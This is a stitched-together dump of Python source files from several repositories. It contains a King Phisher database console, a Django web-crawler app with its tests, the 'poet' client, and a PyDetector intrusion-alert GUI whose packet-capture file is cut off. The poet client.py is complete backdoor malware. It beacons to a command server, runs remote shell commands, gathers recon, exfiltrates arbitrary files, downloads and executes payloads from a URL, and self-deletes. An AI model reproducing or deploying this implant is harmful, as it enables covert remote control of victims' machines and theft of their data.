import sys
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from king_phisher import version
from king_phisher.server.database import manager
from king_phisher.server.database import models
import yaml
try:
import readline
except ImportError:
pass
else:
import rlcompleter
readline.parse_and_bind('tab: complete')
def main():
parser = argparse.ArgumentParser(description='King Phisher Interactive Database Console', conflict_handler='resolve')
parser.add_argument('-v', '--version', action='version', version=parser.prog + ' Version: ' + version.version)
parser.add_argument('-L', '--log', dest='loglvl', action='store', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default='CRITICAL', help='set the logging level')
config_group = parser.add_mutually_exclusive_group(required=True)
config_group.add_argument('-c', '--config', dest='server_config', type=argparse.FileType('r'), help='the server configuration file')
config_group.add_argument('-u', '--url', dest='database_url', help='the database connection url')
arguments = parser.parse_args()
logging.getLogger('').setLevel(logging.DEBUG)
console_log_handler = logging.StreamHandler()
console_log_handler.setLevel(getattr(logging, arguments.loglvl))
console_log_handler.setFormatter(logging.Formatter("%(levelname)-8s %(message)s"))
logging.getLogger('').addHandler(console_log_handler)
if arguments.database_url:
database_connection_url = arguments.database_url
elif arguments.server_config:
server_config = yaml.safe_load(arguments.server_config)  # the config is plain data; yaml.load can execute arbitrary Python
database_connection_url = server_config['server']['database']
else:
raise RuntimeError('no database connection was specified')
engine = manager.init_database(database_connection_url)
session = manager.Session()
console = code.InteractiveConsole(dict(engine=engine, manager=manager, models=models, session=session))
console.interact('starting interactive database console')
if __name__ == '__main__':
sys.exit(main())
``` |
{
"source": "0x0mar/memex-explorer",
"score": 2
} |
#### File: 0x0mar/memex-explorer/conftest.py
```python
import pytest
def pytest_addoption(parser):
"""Add `--runslow` option to py.test."""
parser.addoption("--runslow", action="store_true",
help="run slow tests")
def pytest_runtest_setup(item):
"""pytest items marked `slow` should not run by default."""
if 'slow' in item.keywords and not item.config.getoption("--runslow"):
pytest.skip("need --runslow option to run")
```
#### File: crawl_space/tests/test_crawl.py
```python
from __future__ import unicode_literals
import os
import shutil
# Test
from memex.test_utils.unit_test_utils import UnitTestSkeleton, form_errors, get_object
from django.test import TestCase
from django.core.files.uploadedfile import SimpleUploadedFile
# App
from apps.crawl_space.forms import AddCrawlForm
from apps.crawl_space.models import Crawl, CrawlModel
from base.models import Project, alphanumeric_validator
def assert_form_errors(response, *errors):
"""Given a response, assert that only the given `errors`
are present in the form response."""
efe = expected_form_errors = set(errors)
assert set(form_errors(response).keys()) - efe == set()
class TestViews(UnitTestSkeleton):
@classmethod
def setUpClass(cls):
"""Initialize a test project and crawl model,
and save them to the test database."""
super(TestViews, cls).setUpClass()
cls.test_project = Project(
name = "Test",
description = "Test Project Description")
cls.test_project.save()
cls.test_crawl = Crawl(
name = "Test Crawl",
description = "Test Crawl Description",
crawler = "nutch",
config = "config_default",
seeds_list = cls.get_seeds(),
project = cls.test_project)
cls.test_crawl.save()
cls.test_crawlmodel = CrawlModel(
name = "Test Crawl Model",
model = cls.get_model_file(),
features = cls.get_features_file(),
project = cls.test_project,
)
cls.test_crawlmodel.save()
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.test_crawl.get_crawl_path())
@classmethod
def get_model_file(cls):
return SimpleUploadedFile('pageclassifier.model', bytes('This is a model file.\n'), 'utf-8')
@classmethod
def get_features_file(cls):
return SimpleUploadedFile('pageclassifier.features', bytes('This is a features file.\n'), 'utf-8')
@classmethod
def get_seeds(cls):
"""Return a new instance of SimpleUploadedFile. This file can only
be used once."""
return SimpleUploadedFile('ht.seeds', bytes('This is some content.\n'), 'utf-8')
@property
def form_data(self):
"""Provide a dictionary of valid form data."""
return {
'name': 'Cat Crawl',
'description': 'Find all the cats.',
'crawler': 'ache',
'seeds_list': self.get_seeds(),
'crawl_model': self.test_crawlmodel.pk,
}
@property
def slugs(self):
"""Return a dictionary with a "test" project slug."""
return dict(slugs=dict(
project_slug="test"))
@property
def crawl_slugs(self):
"""Return a dictionary with a "test" project slug and
a "test-crawl" crawl slug."""
return dict(slugs=dict(
project_slug="test",
crawl_slug="test-crawl"))
def test_add_crawl_page(self):
"""Get the add_crawl page with **self.slugs and assert that
the right template is returned."""
response = self.get('base:crawl_space:add_crawl', **self.slugs)
assert 'crawl_space/add_crawl.html' in response.template_name
def test_add_crawl_no_data(self):
"""Post with an empty form, assert that each of the missings fields
prompts an error."""
response = self.post('base:crawl_space:add_crawl', **self.slugs)
assert_form_errors(response, *self.form_data.keys())
def test_add_crawl_bad_name(self):
"""Post with a non-alphanumeric name."""
import re
form_data = self.form_data
form_data['name'] = bad_name = "lEe7$|>EE|<"
validator = alphanumeric_validator()
assert re.match(validator.regex, bad_name) is None
response = self.post('base:crawl_space:add_crawl',
form_data, **self.slugs)
assert_form_errors(response, 'name')
def test_add_crawl_bad_crawler(self):
"""Post with an invalid crawler."""
form_data = self.form_data
form_data['crawler'] = "error"
response = self.post('base:crawl_space:add_crawl',
form_data, **self.slugs)
assert_form_errors(response, 'crawl_model', 'crawler')
def test_add_crawl_success(self):
"""Post with a valid form payload, and assert that
the client is redirected to the appropriate crawl page."""
response = self.post('base:crawl_space:add_crawl',
self.form_data,
**self.slugs)
assert 'crawl_space/crawl.html' in response.template_name
def test_crawl_page(self):
"""Get the test crawl page, and assert that the
crawl slug is generated properly and the project
is linked correctly."""
response = self.get('base:crawl_space:crawl', **self.crawl_slugs)
assert 'crawl_space/crawl.html' in response.template_name
crawl = get_object(response)
assert (crawl.name, crawl.slug) == ("Test Crawl", "test-crawl")
assert crawl.project == self.test_project
def test_crawl_settings_page(self):
response = self.get('base:crawl_space:crawl_settings', **self.crawl_slugs)
assert 'crawl_space/crawl_update_form.html' in response.template_name
def test_crawl_settings_change_name(self):
response = self.post('base:crawl_space:crawl_settings',
{'name': 'Cat Crawl'}, **self.crawl_slugs)
crawl = get_object(response)
assert crawl.name == "Cat Crawl"
def test_crawl_settings_change_description(self):
response = self.post('base:crawl_space:crawl_settings',
{'description': 'A crawl for information about cats.'},
**self.crawl_slugs)
crawl = get_object(response)
assert crawl.description == "A crawl for information about cats."
def test_crawl_delete(self):
response = self.post('base:crawl_space:delete_crawl',
**self.crawl_slugs)
assert 'base/project.html' in response.template_name
```
#### File: apps/crawl_space/views.py
```python
import os
from os.path import join
import sys
import json
import csv
import subprocess
import shutil
import itertools
from django.views.generic import ListView, DetailView
from django.views.generic.base import ContextMixin
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.contrib.messages.views import SuccessMessageMixin
from django.apps import apps
from django.http import HttpResponse
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from base.models import Project
from apps.crawl_space.models import Crawl, CrawlModel
from apps.crawl_space.forms import AddCrawlForm, AddCrawlModelForm, CrawlSettingsForm
from apps.crawl_space.utils import touch
from apps.crawl_space.viz.plot import AcheDashboard
from apps.crawl_space.settings import CRAWL_PATH, IMAGES_PATH
class ProjectObjectMixin(ContextMixin):
def get_project(self):
return Project.objects.get(slug=self.kwargs['project_slug'])
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super(ProjectObjectMixin, self).get_context_data(**kwargs)
context['project'] = self.get_project()
return context
class AddCrawlView(SuccessMessageMixin, ProjectObjectMixin, CreateView):
form_class = AddCrawlForm
template_name = "crawl_space/add_crawl.html"
success_message = "Crawl %(name)s was saved successfully."
def get_success_url(self):
return self.object.get_absolute_url()
def form_valid(self, form):
form.instance.project = self.get_project()
return super(AddCrawlView, self).form_valid(form)
class ListCrawlsView(ProjectObjectMixin, ListView):
model = Crawl
template_name = "crawl_space/crawls.html"
class CrawlView(ProjectObjectMixin, DetailView):
model = Crawl
template_name = "crawl_space/crawl.html"
@method_decorator(csrf_exempt)
def dispatch(self, *args, **kwargs):
return super(CrawlView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
crawl_model = self.get_object()
# Start
if request.POST['action'] == "start":
crawl_model.status = "starting"
crawl_model.save()
project_slug = self.kwargs['project_slug']
crawl_slug = self.kwargs['crawl_slug']
call = ["python",
"apps/crawl_space/crawl_supervisor.py",
"--project", project_slug,
"--crawl", crawl_slug]
subprocess.Popen(call)
return HttpResponse(json.dumps(dict(
status="starting")),
content_type="application/json")
# Stop
elif request.POST['action'] == "stop":
crawl_model.status = 'stopping'
crawl_model.save()
crawl_path = crawl_model.get_crawl_path()
# TODO use crawl_model.status as a stop flag
touch(join(crawl_path, 'stop'))
return HttpResponse(json.dumps(dict(
status="stopping")),
content_type="application/json")
# Dump Images
elif request.POST['action'] == "dump":
self.dump_images()
return HttpResponse("Success")
# Update status, statistics
elif request.POST['action'] == "status":
return HttpResponse(json.dumps(dict(
status=crawl_model.status,
harvest_rate=crawl_model.harvest_rate,
pages_crawled=crawl_model.pages_crawled,
)),
content_type="application/json")
# TESTING reflect POST request
return HttpResponse(json.dumps(dict(
args=args,
kwargs=kwargs,
post=request.POST)),
content_type="application/json")
def dump_images(self):
self.img_dir = os.path.join(IMAGES_PATH, self.get_object().slug)
# recreate the image dump directory from scratch; the original if/else
# skipped makedirs() after rmtree(), leaving the directory missing
if os.path.exists(self.img_dir):
shutil.rmtree(self.img_dir)
os.makedirs(self.img_dir)
img_dump_proc = subprocess.Popen(["nutch", "dump", "-outputDir", self.img_dir, "-segment",
os.path.join(self.get_object().get_crawl_path(), 'segments'),"-mimetype",
"image/jpeg", "image/png"]).wait()
return "Dumping images"
def get(self, request, *args, **kwargs):
# Get Relevant Seeds File
if not request.GET:
# no url parameters, return regular response
return super(CrawlView, self).get(request, *args, **kwargs)
elif 'resource' in request.GET and request.GET['resource'] == "seeds":
seeds = self.get_ache_dashboard().get_relevant_seeds()
response = HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=relevant_seeds.txt'
response.write('\n'.join(seeds))
return response
elif 'resource' in request.GET and request.GET['resource'] == "initial_seeds":
seeds = self.get_seeds_list()
response = HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=seeds.txt'
response.write(''.join(seeds))
return response
elif 'resource' in request.GET and request.GET['resource'] == "crawl_log":
crawl_log = self.get_crawl_log()
response = HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=crawl_log.txt'
response.write(crawl_log)
return response
def get_crawl_log(self):
log_path = os.path.join(self.get_object().get_crawl_path(), "crawl_proc.log")
with open(log_path) as f:
crawl_log = f.readlines()
return ''.join(crawl_log)
def get_seeds_path(self):
if self.get_object().crawler == "nutch":
seeds_path = os.path.join(self.get_object().seeds_list.path, "seeds")
elif self.get_object().crawler == "ache":
seeds_path = self.get_object().seeds_list.path
else:
seeds_path = ""
return seeds_path
def get_seeds_list(self, lines=None):
with open(self.get_seeds_path()) as f:
if lines:
seeds_list = list(itertools.islice(f, lines))
else:
seeds_list = f.readlines()
return seeds_list
def get_object(self):
return Crawl.objects.get(
project=self.get_project(),
slug=self.kwargs['crawl_slug'])
def get_ache_dashboard(self):
return AcheDashboard(self.get_object())
def get_context_data(self, **kwargs):
context = super(CrawlView, self).get_context_data(**kwargs)
context['project'] = self.get_project()
context['seeds'] = self.get_seeds_list(10)
if self.get_object().crawler == "ache":
plots = AcheDashboard(self.get_object()).get_plots()
context['scripts'] = plots['scripts']
context['divs'] = plots['divs']
return context
class CrawlSettingsView(SuccessMessageMixin, ProjectObjectMixin, UpdateView):
model = Crawl
form_class = CrawlSettingsForm
success_message = "Crawl %(name)s was edited successfully."
template_name_suffix = '_update_form'
def get_success_url(self):
return self.object.get_absolute_url()
def get_object(self):
return Crawl.objects.get(
project=self.get_project(),
slug=self.kwargs['crawl_slug'])
class AddCrawlModelView(SuccessMessageMixin, ProjectObjectMixin, CreateView):
form_class = AddCrawlModelForm
template_name = "crawl_space/add_crawl_model.html"
success_message = "Crawl model %(name)s was added successfully."
def form_valid(self, form):
form.instance.project = self.get_project()
return super(AddCrawlModelView, self).form_valid(form)
def get_success_url(self):
return self.object.get_absolute_url()
class DeleteCrawlView(SuccessMessageMixin, ProjectObjectMixin, DeleteView):
model = Crawl
success_message = "Crawl %(name)s was deleted successfully."
def delete(self, request, *args, **kwargs):
""" Remove crawl folder """
# shutil.rmtree(os.path.join(CRAWL_PATH, str(self.get_object().pk)))
return super(DeleteCrawlView, self).delete(request, *args, **kwargs)
def get_success_url(self):
return self.get_project().get_absolute_url()
def get_object(self):
return Crawl.objects.get(project=self.get_project(),
slug=self.kwargs['crawl_slug'])
class DeleteCrawlModelView(SuccessMessageMixin, ProjectObjectMixin, DeleteView):
model = CrawlModel
success_message = "Crawl model %(name)s was deleted successfully."
def get_success_url(self):
return self.get_project().get_absolute_url()
def get_object(self):
return CrawlModel.objects.get(
project=self.get_project(),
slug=self.kwargs['model_slug'])
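
# --- Illustrative sketch (not part of the original file) ---
# Driving CrawlView's POST actions with Django's test client; the URL
# below is a hypothetical route to a crawl detail page.
#
# from django.test import Client
# resp = Client().post('/projects/test/crawls/test-crawl/', {'action': 'status'})
# json.loads(resp.content)  # {"status": ..., "harvest_rate": ..., "pages_crawled": ...}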
```
#### File: test_crawl/tests/test_nutch_crawl.py
```python
from __future__ import unicode_literals
import os
import shutil
from django.core.urlresolvers import reverse
from django.conf import settings
# # Test
from memex.test_utils.unit_test_utils import UnitTestSkeleton, get_object
from django.core.files.uploadedfile import SimpleUploadedFile
# # App
from apps.crawl_space.models import Crawl
from base.models import Project
class TestViews(UnitTestSkeleton):
@classmethod
def setUpClass(cls):
"""Initialize a test project and crawl,
and save them to the test database."""
super(TestViews, cls).setUpClass()
shutil.rmtree(os.path.join(settings.MEDIA_ROOT, 'crawls'))
cls.test_project = Project(
name = "Crawl Operation",
description = "Test Project Description")
cls.test_project.save()
cls.test_crawl = Crawl(
name = "Test Crawl Operation",
description = "Test Crawl Description",
crawler = "nutch",
config = "config_default",
seeds_list = cls.get_seeds(),
project = cls.test_project)
cls.test_crawl.save()
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.test_crawl.get_crawl_path())
@classmethod
def get_seeds(cls):
"""Return a new instance of SimpleUploadedFile. This file can only
be used once."""
# /content/1
crawl_seed = reverse('base:test_crawl:content',
kwargs=dict(project_slug=cls.test_project.slug, content_id=1))
return SimpleUploadedFile('ht.seeds', bytes(crawl_seed), 'utf-8')
@property
def crawl_slugs(self):
"""Return a dictionary with a "test" project slug and
a "test-crawl" crawl slug."""
return dict(slugs=dict(
project_slug="crawl-operation",
crawl_slug="test-crawl-operation"))
def test_nutch_crawl(self):
"""Get the test crawl page, and assert that the
crawl slug is generated properly and the project
is linked correctly."""
response = self.get('base:crawl_space:crawl', **self.crawl_slugs)
assert 'crawl_space/crawl.html' in response.template_name
crawl = get_object(response)
assert crawl.project == self.test_project
response = self.post('base:crawl_space:crawl', data={'action': 'start'},
**self.crawl_slugs)
assert "starting" in response.content
# assert crawl_is_running
assert True
``` |
{
"source": "0x0mar/poet",
"score": 3
} |
#### File: 0x0mar/poet/client.py
```python
import os
import re
import sys
import stat
import time
import zlib
import base64
import select
import socket
import struct
import os.path
import urllib2
import argparse
import tempfile
import logging as log
import subprocess as sp
from datetime import datetime
PREFIX_LEN = 4
SIZE = 4096
UA = 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
class PoetSocket(object):
"""Socket wrapper for client/server communications.
Attributes:
s: socket instance
Socket abstraction which uses the convention that the message is prefixed
by a big-endian 32 bit value indicating the length of the following base64
string.
"""
def __init__(self, s):
self.s = s
def close(self):
self.s.close()
def exchange(self, msg):
self.send(msg)
return self.recv()
def send(self, msg):
"""Send message over socket."""
pkg = base64.b64encode(msg)
pkg_size = struct.pack('>i', len(pkg))
sent = self.s.sendall(pkg_size + pkg)
if sent:
raise socket.error('socket connection broken')
def recv(self):
"""Receive message from socket.
Returns:
The message sent from client.
"""
chunks = []
bytes_recvd = 0
# In case we don't get all 4 bytes of the prefix on the first recv(),
# this ensures we'll eventually get it intact
while bytes_recvd < PREFIX_LEN:
chunk = self.s.recv(PREFIX_LEN)
if not chunk:
raise socket.error('socket connection broken')
chunks.append(chunk)
bytes_recvd += len(chunk)
initial = ''.join(chunks)
msglen, initial = (struct.unpack('>I', initial[:PREFIX_LEN])[0],
initial[PREFIX_LEN:])
del chunks[:]
bytes_recvd = len(initial)
chunks.append(initial)
while bytes_recvd < msglen:
chunk = self.s.recv(min((msglen - bytes_recvd, SIZE)))
if not chunk:
raise socket.error('socket connection broken')
chunks.append(chunk)
bytes_recvd += len(chunk)
return base64.b64decode(''.join(chunks))
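
# --- Illustrative sketch (not part of the original file) ---
# The wire format implemented above, built by hand: a big-endian 32-bit
# length prefix followed by the base64 of the payload.
def _example_frame(msg):
    pkg = base64.b64encode(msg)
    return struct.pack('>I', len(pkg)) + pkg

def _example_unframe(frame):
    msglen = struct.unpack('>I', frame[:PREFIX_LEN])[0]
    return base64.b64decode(frame[PREFIX_LEN:PREFIX_LEN + msglen])
# _example_unframe(_example_frame('ping')) == 'ping'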
class PoetSocketClient(PoetSocket):
def __init__(self, host, port):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((host, port))
super(PoetSocketClient, self).__init__(self.s)
class PoetClient(object):
"""Core client functionality.
Receives commands from server, does bidding, responds.
Note: In any function with `inp' as a parameter, `inp' refers to the
command string sent from the server.
Attributes:
host: server ip address
port: server port
"""
def __init__(self, host, port):
self.host = host
self.port = port
def start(self):
"""Core Poet client functionality."""
s = PoetSocketClient(self.host, self.port)
while True:
try:
inp = s.recv()
if inp == 'fin':
break
elif inp == 'getprompt':
s.send(self.get_prompt())
elif re.search('^exec ("[^"]+"\ )+$', inp + ' '):
s.send(self.execute(inp))
elif inp == 'recon':
s.send(zlib.compress(self.recon()))
elif inp.startswith('shell '):
self.shell(inp, s)
s.send('shelldone')
elif inp.startswith('exfil '):
try:
with open(os.path.expanduser(inp[6:])) as f:
s.send(zlib.compress(f.read()))
except IOError as e:
s.send(e.strerror)
elif inp == 'selfdestruct':
try:
if not args.delete:
os.remove(__file__)
if __file__.strip('./') not in os.listdir('.'):
s.send('boom')
sys.exit()
else:
raise Exception('client not deleted')
except Exception as e:
s.send(str(e.message))
elif inp.startswith('dlexec '):
try:
self.dlexec(inp)
s.send('done')
except Exception as e:
s.send(str(e.message))
elif inp.startswith('chint'):
self.chint(s, inp)
else:
s.send('Unrecognized')
except socket.error as e:
if e.message == 'too much data!':
s.send('psh : ' + e.message)
else:
raise
s.close()
def execute(self, inp):
"""Handle server `exec' command.
Execute specially formatted input string and return specially formatted
response.
"""
out = ''
cmds = self.parse_exec_cmds(inp)
for cmd in cmds:
cmd_out = self.cmd_exec(cmd)
out += '='*20 + '\n\n$ {}\n{}\n'.format(cmd, cmd_out)
return out
def recon(self):
"""Executes recon commands."""
ipcmd = 'ip addr' if 'no' in self.cmd_exec('which ifconfig') else 'ifconfig'
exec_str = 'exec "whoami" "id" "uname -a" "lsb_release -a" "{}" "w" "who -a"'.format(ipcmd)
return self.execute(exec_str)
def dlexec(self, inp):
"""Handle server `dlexec' command.
Download file from internet, save to temp file, execute.
"""
r = urllib2.urlopen(inp.split()[1])
# don't delete the file automatically: deleting it here could remove it
# before it gets loaded into memory for execution. Keeping it around
# means we don't need to wait() on the process (or use sp.call()) later
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(r.read())
os.fchmod(f.fileno(), stat.S_IRWXU)
f.flush() # ensure that file was actually written to disk
# intentionally not using sp.call() here because we don't
# necessarily want to wait() on the process
sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)
def chint(self, s, inp):
"""Handle server `chint' command.
Send back the current delay interval or set it to new value.
"""
if inp == 'chint':
# no arg, so just send back the interval
s.send(str(args.interval))
else:
# set interval to arg
try:
num = int(inp[6:])
if num < 1 or num > 60*60*24:
msg = 'Invalid interval time.'
else:
args.interval = num
msg = 'done'
s.send(msg)
except Exception as e:
s.send(str(e.message))
def shell(self, inp, s):
"""Psh `shell' command client-side.
Create a subprocess for command and line buffer command output to
server while listening for signals from server.
Args:
s: PoetSocketClient instance
"""
inp = inp[6:] # get rid of 'shell ' prefix
# handle cd builtin
if re.search('^cd( .+)?$', inp):
if inp == 'cd':
os.chdir(os.path.expanduser('~'))
else:
try:
os.chdir(os.path.expanduser(inp[3:]))
except OSError as e:
s.send('cd: {}\n'.format(e.strerror))
return
# everything else
proc = sp.Popen(inp, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True)
while True:
readable = select.select([proc.stdout, s.s], [], [], 30)[0]
for fd in readable:
if fd == proc.stdout: # proc has stdout/err to send
output = proc.stdout.readline()
if output:
s.send(output)
else:
return
elif fd == s.s: # remote signal from server
sig = s.recv()
if sig == 'shellterm':
proc.terminate()
return
def cmd_exec(self, cmd):
"""Light wrapper over subprocess.Popen()."""
return sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT,
shell=True).communicate()[0]
def get_prompt(self):
"""Create shell prompt.
Using current user and hostname, create shell prompt for server `shell'
command.
"""
user = self.cmd_exec('whoami').strip()
hn = self.cmd_exec('hostname').strip()
end = '#' if user == 'root' else '$'
return '{}@{} {} '.format(user, hn, end)
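# Illustrative (names are made up): get_prompt() yields e.g. 'alice@devbox $ ',
# or 'root@devbox # ' when running as root.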
def parse_exec_cmds(self, inp):
"""Parse string provided by server `exec' command.
Convert space delimited string with commands to execute in quotes, for
example ("ls -l" "cat /etc/passwd") into list with commands as strings.
Returns:
List of commands to execute.
"""
cmds = []
inp = inp[5:]
num_cmds = inp.count('"') / 2
for i in range(num_cmds):
first = inp.find('"')
second = inp.find('"', first+1)
cmd = inp[first+1:second]
cmds.append(cmd)
inp = inp[second+2:]
return cmds
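# Illustrative sketch of the parsing above (the commands are made up):
# parse_exec_cmds('exec "ls -l" "cat /etc/passwd"') -> ['ls -l', 'cat /etc/passwd']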
def get_args():
""" Parse arguments and return dictionary. """
parser = argparse.ArgumentParser()
parser.add_argument('host', metavar='IP', type=str, help='server')
parser.add_argument('interval', metavar='INTERVAL', type=int, help='(s)')
parser.add_argument('-p', '--port')
parser.add_argument('-v', '--verbose', action="store_true")
parser.add_argument('-d', '--delete', action="store_true",
help="delete client upon execution")
return parser.parse_args()
def is_active(host, port):
"""Check if server is active.
Send HTTP GET for a fake /style.css which server will respond to if it's
alive.
Args:
host: server ip address
port: server port
Returns:
Boolean for server state.
"""
try:
url = 'http://{}:{}/style.css'.format(host, port)
req = urllib2.Request(url, headers={'User-Agent': UA})
f = urllib2.urlopen(req)
if f.code == 200:
return True
except urllib2.URLError:
pass
return False
def main():
global args
args = get_args()
if args.verbose:
log.basicConfig(format='%(message)s', level=log.INFO)
else:
log.basicConfig(format='%(message)s')
if args.delete:
log.info('[+] Deleting client.')
os.remove(__file__)
HOST = args.host
PORT = int(args.port) if args.port else 443
log.info(('[+] Poet started with interval of {} seconds to port {}.' +
' Ctrl-c to exit.').format(args.interval, PORT))
try:
while True:
if is_active(HOST, PORT):
log.info('[+] ({}) Server is active'.format(datetime.now()))
PoetClient(HOST, PORT).start()
else:
log.info('[!] ({}) Server is inactive'.format(datetime.now()))
time.sleep(args.interval)
except KeyboardInterrupt:
print
log.info('[-] ({}) Poet terminated.'.format(datetime.now()))
except socket.error as e:
log.info('[!] ({}) Socket error: {}'.format(datetime.now(), e.message))
log.info('[-] ({}) Poet terminated.'.format(datetime.now()))
sys.exit(0)
if __name__ == '__main__':
main()
``` |
{
"source": "0x0mar/PyDetector",
"score": 3
} |
#### File: 0x0mar/PyDetector/alerts.py
```python
import Tkinter
import base64
import thread
from Tkconstants import *
from Tkinter import *
from PIL import Image, ImageTk
import capture
import parse_packet
import time
import ips
alpha=10
global mla
flag=0
global ta
global frame
s_no=1
def iptables():
ipt=Tk()
ipt.wm_title("IPTABLES")
#frame = Tkinter.Frame(ipt, relief=RAISED,width=10, height=11,colormap="new")
##frame.pack(fill=BOTH,expand=1)
for i in ips.set_ips:
rd=Tkinter.Radiobutton(ipt, text="%s : %s : %s : %s : %s"%(i[0], i[1], i[2], i[3], i[4]), width=150, indicatoron=0, activeforeground="blue", padx=20, pady=5, command=lambda i=i: ips.flush(i[1], i[4])) # bind i as a default argument so each button flushes its own row (late-binding fix)
rd.pack()
#rd=Tkinter.Radiobutton(frame,text="ss",width=20,command=ips.flush)
#rd.pack()
#rd=Tkinter.Radiobutton(frame,text="ss",width=20,command=ips.flush)
#rd.pack()
#RADIOBUTTON(ipt,text="ips").pack()
w=5000
h=3000
ws = ipt.winfo_screenwidth()
hs = ipt.winfo_screenheight()
#calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
ipt.geometry('%dx%d+%d+%d' % (w, h, x, y))
ipt.mainloop()
def insert(s_addr,s_mac,message,attack,severity):
print "in alert.insert"
global mla,s_no
#print parse_packet.s_addr
mla.insert(END,('%d' % s_no , '%s'%(time.strftime("%d/%m/%Y")),'%s'% (time.strftime("%H:%M:%S")),'%s' %message,'%s'% attack,'%s' %s_addr,'%s'%s_mac,'%s' %severity))
mla.pack(expand=YES,fill=BOTH)
s_no=s_no+1
print parse_packet.s_addr
#mlb.pack(expand=YES,fill=BOTH)
#frame = Tkinter.Frame(tk, relief=RAISED,width=1786, height=11, colormap="new")
#frame.pack(fill=BOTH,expand=1)
#label = Tkinter.Label(frame, text="")
#label.pack(fill=X, expand=1)
#button = Tkinter.Button(frame,text="Exit",command=PyDetector.destroy)
#button.pack(side=BOTTOM)
#tk.mainloop( )
ta.update()
'''
def start_fix_thread(self):
thread.start_new_thread(ips.main(self,))
def start_flush_thread(self):
thread.start_new_thread(iptables(self,))
'''
def main(self):
print "in alert.main-----------"
global flag
global ta
global mla
flag=99
ta = Tk( )
ta.wm_title("Alerts")
#image = Image.open("/root/Desktop/kali.png")
#photo = ImageTk.PhotoImage(image)
#Label(ta,text='',photo=image).pack( )
#ips_o=ips.ips()
Button(ta,text="FIX",width=20,fg='black',bg='green',command=ips.main).pack(side=TOP)
Button(ta,text="FLUSH",width=20,fg='black',bg='green',command=iptables).pack(side=TOP)
mla = MultiListbox(ta, (('S.No.',1),('Date',3),('Time',3),('Message',20),('Attack', 10),('Source address',10),('Source Mac',10),('Severity', 3)))
#for i in range(1000):
# mlb.insert(END,('Alert generated for: %d' % i, 'TCP','10/10/%04d' % (1900+i)))
#while(True):
mla.pack(expand=YES,fill=BOTH)
#frame = Tkinter.Frame(tk, relief=RAISED,width=1786, height=11, colormap="new")
#frame.pack(fill=BOTH,expand=1)
#label = Tkinter.Label(frame, text="")
#label.pack(fill=X, expand=1)
#mlb.after(self,1000,self.updateGUI)
w=5000
h=3000
ws = ta.winfo_screenwidth()
hs = ta.winfo_screenheight()
#calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
ta.geometry('%dx%d+%d+%d' % (w, h, x, y))
ta.mainloop( )
class MultiListbox(Frame):
def __init__(self, master, lists):
Frame.__init__(self, master)
self.lists = []
for l,w in lists:
frame = Frame(self); frame.pack(side=LEFT,expand=YES, fill=BOTH)
#frame.pack(side=,expand=YES, fill=BOTH)
Label(frame, text=l, borderwidth=7,relief=RAISED).pack(fill=X)
lb = Listbox(frame, width=w, borderwidth=1,selectborderwidth=1,selectbackground='cyan',selectforeground='red',cursor='pirate',relief=RAISED, exportselection=FALSE)
lb.pack(expand=YES, fill=BOTH)
self.lists.append(lb)
lb.bind('<B1-Motion>', lambda e, s=self:
s._select(e.y))
lb.bind('<Button-1>', lambda e, s=self:
s._select(e.y))
lb.bind('<Leave>', lambda e: 'break')
lb.bind('<B2-Motion>', lambda e, s=self:
s._b2motion(e.x, e.y))
lb.bind('<Button-2>', lambda e, s=self:
s._button2(e.x, e.y))
frame = Frame(self); frame.pack(side=LEFT, fill=Y)
Label(frame, borderwidth=1,relief=RAISED).pack(fill=X)
sb = Scrollbar(frame, orient=VERTICAL,command=self._scroll)
sb.pack(expand=YES, fill=Y)
self.lists[0]['yscrollcommand']=sb.set
def _select(self, y):
row = self.lists[0].nearest(y)
self.selection_clear(0, END)
self.selection_set(row)
return 'break'
def _button2(self, x, y):
for l in self.lists: l.scan_mark(x, y)
return 'break'
def _b2motion(self, x, y):
for l in self.lists: l.scan_dragto(x, y)
return 'break'
def _scroll(self, *args):
for l in self.lists:
apply(l.yview, args)
def curselection(self):
return self.lists[0].curselection()
def delete(self, first, last=None):
for l in self.lists:
l.delete(first, last)
def get(self, first, last=None):
result = []
for l in self.lists:
result.append(l.get(first,last))
if last: return apply(map, [None] + result)
return result
def index(self, index):
self.lists[0].index(index)
def insert(self, index, *elements):
for e in elements:
i = 0
for l in self.lists:
l.insert(index, e[i])
i = i + 1
def size(self):
return self.lists[0].size()
def see(self, index):
for l in self.lists:
l.see(index)
def selection_anchor(self, index):
for l in self.lists:
l.selection_anchor(index)
def selection_clear(self, first, last=None):
for l in self.lists:
l.selection_clear(first, last)
def selection_includes(self, index):
return self.lists[0].selection_includes(index)
def selection_set(self, first, last=None):
for l in self.lists:
l.selection_set(first, last)
if __name__=='__main__':
main()
```
#### File: 0x0mar/PyDetector/capture.py
```python
import pcapy
from timeit import default_timer
#from threading import Timer
#from logs import *
start=0
duration_sync_flood=0
total_packets=0
global packets
packets=[]
no_syn_packets=0
no_syn_ack_packets=0
no_ack_packets=0
def main(self):
#list all devices
global start, total_packets
start = default_timer()
print "in capture main"
devices = pcapy.findalldevs()
print devices
#ask user to enter device name to sniff
print "Available devices are :"
for d in devices :
print d
# dev = raw_input("Enter device name to sniff : ")
# print "Sniffing device " + dev
dev="eth0"
'''
open device
# Arguments here are:
# device
# snaplen (maximum number of bytes to capture _per_packet_)
# promiscious mode (1 for true)
# timeout (in milliseconds)
'''
cap = pcapy.open_live(dev , 65536 , 1 , 0)
#start sniffing packets
while(True) :
print "total packet = %d" %total_packets
